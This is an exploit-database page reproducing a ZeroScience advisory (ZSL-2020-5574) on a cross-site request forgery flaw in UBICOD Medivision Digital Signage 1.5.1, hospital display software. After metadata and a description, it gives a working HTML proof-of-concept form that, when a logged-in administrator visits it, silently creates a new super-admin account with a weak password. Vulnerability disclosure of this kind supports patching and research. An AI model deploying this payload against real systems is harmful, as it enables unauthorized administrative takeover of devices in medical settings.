Advertisement






UBICOD Medivision Digital Signage 1.5.1 Cross Site Request Forgery

CVE Category Price Severity
CVE-2021-22257 CWE-352 Not specified Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2020-07-21
CPE
cpe:cpe:/a:ubicod:medivision_digital_signage:1.5.1
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070114

Below is a copy:

UBICOD Medivision Digital Signage 1.5.1 Cross Site Request Forgery
<!--

UBICOD Medivision Digital Signage 1.5.1 CSRF Add Super Admin


Vendor: UBICOD Co., Ltd. | MEDIVISION INC.
Product web page: http://www.medivision.co.kr
Affected version: Firmware 1.5.1 (2013.01.3)

Summary: Medivision is a service that provides everything from DID operation to
development of DID (Digital Information Display) optimized for hospital environment
and production of professional contents, through DID product installation, image,
video content planning, design work, and remote control. This is a one-stop solution
that solves management at once.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.

Tested on: Apache/2.4.7 (Ubuntu)
           PHP/5.5.9-1ubuntu4.22


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5574
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5574.php


19.06.2020

-->


<html>
  <body>
    <form action="http://10.0.39.2/query/user/itSet" method="POST">
      <input type="hidden" name="aa[_id]" value="" />
      <input type="hidden" name="aa[uid]" value="testingus2" />
      <input type="hidden" name="aa[name]" value="TestN" />
      <input type="hidden" name="aa[pass]" value="123456" />
      <input type="hidden" name="aa[email]" value="[email protected]" />
      <input type="hidden" name="aa[mobile]" value="111-222-3333" />
      <input type="hidden" name="aa[phone]" value="333-222-1111" />
      <input type="hidden" name="aa[approval]" value="+" />
      <input type="hidden" name="aa[grp]" value="3" />
      <input type="hidden" name="od[]" value="name" />
      <input type="hidden" name="ip" value="0" />
      <input type="hidden" name="np" value="13" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum